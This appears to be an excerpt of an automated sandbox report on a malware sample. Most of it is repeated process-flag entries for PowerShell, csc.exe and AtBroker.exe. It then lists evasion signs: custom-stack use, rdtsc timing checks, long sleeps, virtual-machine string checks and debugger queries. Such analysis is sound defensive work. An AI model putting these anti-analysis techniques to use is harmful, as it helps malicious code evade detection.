                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\igcc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\igcc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Switches to a custom stack to bypass stack traces
                  Source: C:\Users\user\AppData\Roaming\igcc.exeAPI/Special instruction interceptor: Address: 1455194
                  Source: C:\Windows\SysWOW64\AtBroker.exeAPI/Special instruction interceptor: Address: 7FFCC372D324
                  Source: C:\Windows\SysWOW64\AtBroker.exeAPI/Special instruction interceptor: Address: 7FFCC372D7E4
                  Source: C:\Windows\SysWOW64\AtBroker.exeAPI/Special instruction interceptor: Address: 7FFCC372D944
                  Source: C:\Windows\SysWOW64\AtBroker.exeAPI/Special instruction interceptor: Address: 7FFCC372D504
                  Source: C:\Windows\SysWOW64\AtBroker.exeAPI/Special instruction interceptor: Address: 7FFCC372D544
                  Source: C:\Windows\SysWOW64\AtBroker.exeAPI/Special instruction interceptor: Address: 7FFCC372D1E4
                  Source: C:\Windows\SysWOW64\AtBroker.exeAPI/Special instruction interceptor: Address: 7FFCC3730154
                  Source: C:\Windows\SysWOW64\AtBroker.exeAPI/Special instruction interceptor: Address: 7FFCC372DA44
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A5BBA0 rdtsc 13_2_03A5BBA0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeWindow / User API: threadDelayed 9987Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5860Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3864Jump to behavior
                  Source: C:\Windows\SysWOW64\AtBroker.exeWindow / User API: threadDelayed 3919Jump to behavior
                  Source: C:\Windows\SysWOW64\AtBroker.exeWindow / User API: threadDelayed 6054Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qetstupm\qetstupm.dllJump to dropped file
                  Source: C:\Users\user\AppData\Roaming\igcc.exeAPI coverage: 4.5 %
                  Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.8 %
                  Source: C:\Windows\SysWOW64\mshta.exe TID: 7576Thread sleep count: 9987 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7764Thread sleep count: 5860 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7760Thread sleep count: 3864 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7812Thread sleep time: -11068046444225724s >= -30000sJump to behavior
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exe TID: 8028Thread sleep time: -85000s >= -30000sJump to behavior
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exe TID: 8028Thread sleep count: 32 > 30Jump to behavior
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exe TID: 8028Thread sleep time: -48000s >= -30000sJump to behavior
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exe TID: 8028Thread sleep count: 37 > 30Jump to behavior
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exe TID: 8028Thread sleep time: -37000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\AtBroker.exe TID: 7924Thread sleep count: 3919 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\AtBroker.exe TID: 7924Thread sleep time: -7838000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\AtBroker.exe TID: 7924Thread sleep count: 6054 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\AtBroker.exe TID: 7924Thread sleep time: -12108000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\AtBroker.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\AtBroker.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_0007445A GetFileAttributesW,FindFirstFileW,FindClose,12_2_0007445A
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_0007C6D1 FindFirstFileW,FindClose,12_2_0007C6D1
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_0007C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,12_2_0007C75C
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_0007EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_0007EF95
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_0007F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_0007F0F2
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_0007F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,12_2_0007F3F3
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_000737EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_000737EF
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_00073B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_00073B12
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_0007BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,12_2_0007BCBC
                  Source: C:\Users\user\AppData\Roaming\igcc.exeCode function: 12_2_000149A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,12_2_000149A0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: powershell.exe, 00000003.00000002.1374616824.00000000046C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                  Source: WRNKS5Hlc0y.exe, 0000000F.00000002.3664314153.0000000000547000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllg>Y
                  Source: powershell.exe, 00000003.00000002.1374616824.00000000046C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                  Source: powershell.exe, 00000003.00000002.1383852652.0000000007CAD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: powershell.exe, 00000003.00000002.1383852652.0000000007C49000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                  Source: powershell.exe, 00000003.00000002.1383852652.0000000007C49000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
                  Source: powershell.exe, 00000003.00000002.1374616824.00000000046C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                  Source: AtBroker.exe, 00000010.00000002.3664527850.00000000033DA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000011.00000002.1963866262.000002E155EEC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\AppData\Roaming\igcc.exeAPI call chain: ExitProcess graph end nodegraph_12-101027
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Windows\SysWOW64\AtBroker.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A5BBA0 rdtsc 13_2_03A5BBA0
